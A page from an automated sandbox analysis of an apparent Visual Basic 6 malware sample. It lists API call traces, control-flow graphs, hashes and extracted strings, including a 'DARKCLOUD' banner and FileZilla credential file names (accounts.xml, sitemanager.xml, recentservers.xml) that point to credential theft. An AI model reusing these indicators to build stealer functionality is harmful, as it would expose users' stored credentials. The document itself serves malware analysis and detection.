                                                          • __vbaI2Var.MSVBVM60(00000000), ref: 0042EEA5
                                                          • __vbaChkstk.MSVBVM60 ref: 0042EF2B
                                                          • __vbaChkstk.MSVBVM60 ref: 0042EF4E
                                                          • __vbaVarIndexLoad.MSVBVM60(?,?,00000001), ref: 0042EF76
                                                          • __vbaChkstk.MSVBVM60 ref: 0042EF86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Chkstk$ErrorFreeMove$#537#632BstrIndexListLoadNofreeOverflowVarg
                                                          • String ID: '@$0'@$053B206F2A0D2B06655B$08575C$ZgRNAHlXcSoVXdhgprKFHpdSWtelPhhsR$ujahrMBxeDdcZkqUOaGiTpm
                                                          • API String ID: 2129149374-2207246312
                                                          • Opcode ID: 7d7038b396ac691d7125a89312b94afd9eb6d567a36b56c488185f786d440747
                                                          • Instruction ID: c7fb5383da4a6bb42bf5c3581b000506b043ba3aefaeaf35e6ebb9f43ff5013a
                                                          • Opcode Fuzzy Hash: 7d7038b396ac691d7125a89312b94afd9eb6d567a36b56c488185f786d440747
                                                          • Instruction Fuzzy Hash: 9F8219B5900218EFDB04DFA4DA88BDEBBB5FF48304F608169E506B72A0DB746A45CF54
                                                          APIs
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00412EE8
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00412F05
                                                          • __vbaStrCat.MSVBVM60(\accounts.xml,006597C0), ref: 00412F28
                                                          • #645.MSVBVM60(00000008,00000000), ref: 00412F47
                                                          • __vbaStrMove.MSVBVM60 ref: 00412F52
                                                          • __vbaStrCmp.MSVBVM60(00405638,00000000), ref: 00412F5E
                                                          • __vbaFreeStr.MSVBVM60 ref: 00412F76
                                                          • __vbaFreeVar.MSVBVM60 ref: 00412F82
                                                          • __vbaNew2.MSVBVM60(00405800,00000000), ref: 00412FAD
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041301D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0041303A
                                                          • __vbaStrCat.MSVBVM60(\accounts.xml,006597C0), ref: 0041305E
                                                          • __vbaChkstk.MSVBVM60(?), ref: 00413080
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405810,000000E8), ref: 004130E8
                                                          • __vbaFreeVar.MSVBVM60 ref: 00413106
                                                          • __vbaNew2.MSVBVM60(00405800,00000000), ref: 00413122
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405810,000000B4), ref: 0041318F
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00405940,00000030), ref: 004131F2
                                                          • __vbaObjSet.MSVBVM60(?,?), ref: 0041322E
                                                          • __vbaForEachCollObj.MSVBVM60(00405940,?,?,00000000), ref: 00413245
                                                          • __vbaFreeObj.MSVBVM60 ref: 00413257
                                                          • __vbaStrCopy.MSVBVM60 ref: 00413271
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00413285
                                                          • __vbaStrCopy.MSVBVM60 ref: 00413293
                                                          • __vbaStrMove.MSVBVM60(?), ref: 004132A7
                                                          • __vbaStrCopy.MSVBVM60 ref: 004132B5
                                                          • __vbaStrMove.MSVBVM60 ref: 004132D4
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405940,00000030), ref: 00413310
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406444,0000001C), ref: 00413375
                                                          • __vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?,00415489), ref: 00415431
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,00000000,004030D6), ref: 00415443
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,00000000,004030D6), ref: 00415452
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 0041545B
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,00000000,004030D6), ref: 00415467
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 00415470
                                                          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 00415479
                                                          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,00000000,004030D6), ref: 00415482
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0041549D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$CheckErrorHresult$BoundsGenerateMove$CopyDestruct$New2$#645ChkstkCollEachListOverflow
                                                          • String ID: %$121C073600320F26382B0364626333011F3D221C2E3605$33250134392504126B5048$===============DARKCLOUD===============$Application : FileZilla$Server$TcDrGNJvvKjh$\accounts.xml$\recentservers.xml$\sitemanager.xml$xSlwZiQnRQDmDXCuhsXxuBZdyNiiKUGCJV
                                                          • API String ID: 1698869595-1275540205
                                                          • Opcode ID: 2e7bde6b2d52f9b7f3cda0c4dad9eff4c73b88cce3b37dbf6a456e6fe0f647c5
                                                          • Instruction ID: b3b07d2a290f5b17187a8344e554760907bdeca9801f3f9a4b2dfbb524d15034
                                                          • Opcode Fuzzy Hash: 2e7bde6b2d52f9b7f3cda0c4dad9eff4c73b88cce3b37dbf6a456e6fe0f647c5
                                                          • Instruction Fuzzy Hash: CF822975D00218DFDB14DF90DE88BEEB7B5FB48301F1081AAE50AA72A0DB745A85CF59

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6045 40cba0-40cc2a __vbaChkstk __vbaOnError 6047 40cc3d-40cc45 6045->6047 6048 40cc47-40cc6a call 404840 __vbaSetSystemError 6047->6048 6049 40cc8c-40ccb2 6047->6049 6053 40cc83-40cc8a 6048->6053 6054 40cc6c-40cc75 6048->6054 6057 40ccb5-40cd3b __vbaErrorOverflow __vbaChkstk __vbaOnError 6053->6057 6058 40cc37 6053->6058 6054->6053 6055 40cc77-40cc7e call 42d140 6054->6055 6055->6053 6062 40cd41-40d3e6 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove call 42ce60 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove call 42ce60 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove call 42ce60 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove call 42ce60 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 #666 __vbaStrCopy __vbaStrMove call 42ddc0 #666 __vbaVarCat * 2 __vbaStrVarMove __vbaStrMove call 42ce60 __vbaFreeStrList __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove call 42ce60 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove call 42ce60 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove call 42ce60 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove call 42ce60 6057->6062 6063 40d425-40d437 6057->6063 6058->6047 6125 40d3eb-40d423 __vbaFreeStrList __vbaFreeVar 6062->6125 6065 40d4d8-40d4df __vbaErrorOverflow 6063->6065 6066 40d43d 6063->6066 6068 40d444-40d4b5 6066->6068 6125->6068
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6), ref: 0040CBBE
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004030D6), ref: 0040CC05
                                                          • __vbaSetSystemError.MSVBVM60(00000100), ref: 0040CC5E
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0040CCB5
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0040CCDE
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004030D6), ref: 0040CD25
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004030D6), ref: 0040CD50
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004030D6), ref: 0040CD64
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004030D6), ref: 0040CD72
                                                          • __vbaStrMove.MSVBVM60 ref: 0040CD91
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040CDA9
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,?,?), ref: 0040CDD2
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,004030D6), ref: 0040CDDE
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004030D6), ref: 0040CDF3
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,004030D6), ref: 0040CE07
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004030D6), ref: 0040CE15
                                                          • __vbaStrMove.MSVBVM60 ref: 0040CE34
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040CE4C
                                                            • Part of subcall function 0042CE60: __vbaChkstk.MSVBVM60(?,004030D6,?,?,?,?,00000000,004030D6), ref: 0042CE7E
                                                            • Part of subcall function 0042CE60: __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004030D6), ref: 0042CEAE
                                                            • Part of subcall function 0042CE60: __vbaStrCat.MSVBVM60(004055A8,00673F04,?,?,?,?,004030D6), ref: 0042CECD
                                                            • Part of subcall function 0042CE60: #645.MSVBVM60(00000008,00000000), ref: 0042CEE3
                                                            • Part of subcall function 0042CE60: __vbaVarMove.MSVBVM60 ref: 0042CEF9
                                                            • Part of subcall function 0042CE60: __vbaFreeVar.MSVBVM60 ref: 0042CF02
                                                            • Part of subcall function 0042CE60: __vbaVarTstGt.MSVBVM60(00008008,?), ref: 0042CF2E
                                                            • Part of subcall function 0042CE60: __vbaInStrVar.MSVBVM60(00000008,00000000,00000008,?,00000001), ref: 0042CF6E
                                                            • Part of subcall function 0042CE60: __vbaBoolVarNull.MSVBVM60(00000000), ref: 0042CF75
                                                            • Part of subcall function 0042CE60: __vbaFreeVar.MSVBVM60 ref: 0042CF85
                                                            • Part of subcall function 0042CE60: __vbaStrCat.MSVBVM60(004055A8,00673F04), ref: 0042CFAD
                                                            • Part of subcall function 0042CE60: __vbaVarCat.MSVBVM60(?,?,00000008), ref: 0042CFC9
                                                            • Part of subcall function 0042CE60: __vbaStrVarMove.MSVBVM60(00000000), ref: 0042CFD0
                                                            • Part of subcall function 0042CE60: __vbaStrMove.MSVBVM60 ref: 0042CFDB
                                                            • Part of subcall function 0042CE60: __vbaVarAdd.MSVBVM60(0000000A,?,00000008), ref: 0042D004
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,?,?), ref: 0040CE75
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0040CE81
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0040CE96
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0040CEAA
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0040CEB8
                                                          • __vbaStrMove.MSVBVM60 ref: 0040CED7
                                                            • Part of subcall function 0042DDC0: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,00000002,?,?,?), ref: 0042DF0A
                                                            • Part of subcall function 0042DDC0: __vbaStrCopy.MSVBVM60 ref: 0042DF29
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(0042DF6C), ref: 0042DF65
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040CEEF
                                                            • Part of subcall function 0042CE60: __vbaStrVarMove.MSVBVM60(00000000), ref: 0042D00B
                                                            • Part of subcall function 0042CE60: __vbaStrMove.MSVBVM60 ref: 0042D016
                                                            • Part of subcall function 0042CE60: __vbaStrCopy.MSVBVM60 ref: 0042D024
                                                            • Part of subcall function 0042CE60: __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?), ref: 0042D049
                                                            • Part of subcall function 0042CE60: __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,004030D6), ref: 0042D060
                                                            • Part of subcall function 0042CE60: #645.MSVBVM60(0000000A,00000000), ref: 0042D084
                                                            • Part of subcall function 0042CE60: __vbaVarMove.MSVBVM60 ref: 0042D09A
                                                            • Part of subcall function 0042CE60: __vbaFreeVar.MSVBVM60 ref: 0042D0A3
                                                            • Part of subcall function 0042CE60: __vbaFreeVar.MSVBVM60(0042D101), ref: 0042D0FA
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,?,?), ref: 0040CF18
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040CF24
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040CF39
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040CF4D
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040CF5B
                                                          • __vbaStrMove.MSVBVM60 ref: 0040CF7A
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040CF92
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,?,?), ref: 0040CFBB
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040CFC7
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040CFDC
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040CFF0
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040CFFE
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D012
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D020
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D03F
                                                          • #666.MSVBVM60(?,00000008,?,?), ref: 0040D064
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D086
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D0A5
                                                          • #666.MSVBVM60(?,00000008,00000000,?), ref: 0040D0D3
                                                          • __vbaVarCat.MSVBVM60(?,00000008,?), ref: 0040D0E8
                                                          • __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0040D0FD
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0040D104
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D10F
                                                          • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,00000000,?,?,00000000,00000000,?,?), ref: 0040D14B
                                                          • __vbaFreeVarList.MSVBVM60(00000007,00000008,?,00000008,?,?,?,?), ref: 0040D17E
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D196
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D1AA
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D1B8
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D1D7
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D1EF
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,00000008,?), ref: 0040D218
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040D224
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D239
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D24D
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D25B
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D27A
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D292
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,00000008,?), ref: 0040D2BB
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040D2C7
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D2DC
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D2F0
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D2FE
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D31D
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D335
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,00000008,?), ref: 0040D35E
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040D36A
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D37F
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D393
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D3A1
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D3C0
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D3D8
                                                          • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000,00000008,?), ref: 0040D401
                                                          • __vbaFreeVar.MSVBVM60 ref: 0040D40D
                                                          Strings
                                                          • MBRISsSbyuoqjWefuJNDccaatoSYiiTqdLJPpuLFyvnv, xrefs: 0040D1B0
                                                          • 351520333D051C351A34123F29, xrefs: 0040D2D4
                                                          • gjoUkezPmYZiUeOCSpjyIcGuCPCtzARw, xrefs: 0040CE0D
                                                          • qlAvrOpVvgNuRDODSmKeLFgIKPpgDHEYi, xrefs: 0040CF53
                                                          • ZYbKuIAfZGABKZsrrWeOuYJ, xrefs: 0040D018
                                                          • 0004083D222D1116, xrefs: 0040CE8E
                                                          • 270A2618041D351E, xrefs: 0040CDEB
                                                          • 29073609033F1E, xrefs: 0040CD48
                                                          • 0F3313162A1E221F062206, xrefs: 0040CF31
                                                          • xvgYCIjKTvXwKZvOGENTBKktGKyOWJn, xrefs: 0040D2F6
                                                          • 1A2D06251C15230809000F0E, xrefs: 0040CFD4
                                                          • 2124001F06, xrefs: 0040D377
                                                          • DCkfICNeeuVDZ, xrefs: 0040CEB0
                                                          • qgMlzuMfFjvipKlYxNNzLIifDrLSvOGWlDcBZTEOTDL, xrefs: 0040D399
                                                          • vjhYbjZmdRZBHfvQqGvzEsedtDPkrRQYO, xrefs: 0040CD6A
                                                          • 221B0C3A05152A30, xrefs: 0040CFF6
                                                          • wwHIhKTguiXEm, xrefs: 0040D07E
                                                          • YpIJTmeQqsCvYsheQHZGgcXBtLRtCuPRz, xrefs: 0040D253
                                                          • 11313B36163D11111A1B, xrefs: 0040D18E
                                                          • 3B2C33100C1130, xrefs: 0040D231
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Copy$List$Error$BstrChkstk$#516#631#645#666$#537#608#632BoolNullOverflowSystem
                                                          • String ID: 0004083D222D1116$0F3313162A1E221F062206$11313B36163D11111A1B$1A2D06251C15230809000F0E$2124001F06$221B0C3A05152A30$270A2618041D351E$29073609033F1E$351520333D051C351A34123F29$3B2C33100C1130$DCkfICNeeuVDZ$MBRISsSbyuoqjWefuJNDccaatoSYiiTqdLJPpuLFyvnv$YpIJTmeQqsCvYsheQHZGgcXBtLRtCuPRz$ZYbKuIAfZGABKZsrrWeOuYJ$gjoUkezPmYZiUeOCSpjyIcGuCPCtzARw$qgMlzuMfFjvipKlYxNNzLIifDrLSvOGWlDcBZTEOTDL$qlAvrOpVvgNuRDODSmKeLFgIKPpgDHEYi$vjhYbjZmdRZBHfvQqGvzEsedtDPkrRQYO$wwHIhKTguiXEm$xvgYCIjKTvXwKZvOGENTBKktGKyOWJn
                                                          • API String ID: 2234777198-1085237787
                                                          • Opcode ID: aab4f0af046433a418a7b600d1cec99bd54f309aefc2f7edc806784fb364b369
                                                          • Instruction ID: cc898633ca16ca78fe1c839a4bcb39ffdc4a13f726c3fd9bc436b6fc38c88b36
                                                          • Opcode Fuzzy Hash: aab4f0af046433a418a7b600d1cec99bd54f309aefc2f7edc806784fb364b369
                                                          • Instruction Fuzzy Hash: 9752EC76901108DBCB04DFE4DA94EDEB7B9FF48304F10856AE106B71A4DB746A49CF64

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6126 4040c1-40cd3b __vbaChkstk __vbaOnError 6129 40cd41-40cd9f __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 6126->6129 6130 40d425-40d437 6126->6130 6138 40cda4-40cdb7 __vbaStrMove call 42ce60 6129->6138 6132 40d4d8-40d4df __vbaErrorOverflow 6130->6132 6133 40d43d 6130->6133 6135 40d444-40d4b5 6133->6135 6140 40cdbc-40ce42 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 6138->6140 6144 40ce47-40ce5a __vbaStrMove call 42ce60 6140->6144 6146 40ce5f-40cee5 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 6144->6146 6150 40ceea-40cefd __vbaStrMove call 42ce60 6146->6150 6152 40cf02-40cf88 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 6150->6152 6156 40cf8d-40cfa0 __vbaStrMove call 42ce60 6152->6156 6158 40cfa5-40d0b3 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 #666 __vbaStrCopy __vbaStrMove call 42ddc0 6156->6158 6166 40d0b8-40d120 #666 __vbaVarCat * 2 __vbaStrVarMove __vbaStrMove call 42ce60 6158->6166 6168 40d125-40d1e5 __vbaFreeStrList __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 6166->6168 6172 40d1ea-40d1fd __vbaStrMove call 42ce60 6168->6172 6174 40d202-40d288 __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 6172->6174 6178 40d28d-40d2a0 __vbaStrMove call 42ce60 6174->6178 6180 40d2a5-40d32b __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 6178->6180 6184 40d330-40d343 __vbaStrMove call 42ce60 6180->6184 6186 40d348-40d3ce __vbaFreeStrList __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 6184->6186 6190 40d3d3-40d3e6 __vbaStrMove call 42ce60 6186->6190 6192 40d3eb-40d423 __vbaFreeStrList __vbaFreeVar 6190->6192 6192->6135
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0040CCDE
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004030D6), ref: 0040CD25
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004030D6), ref: 0040CD50
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004030D6), ref: 0040CD64
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004030D6), ref: 0040CD72
                                                          • __vbaStrMove.MSVBVM60 ref: 0040CD91
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
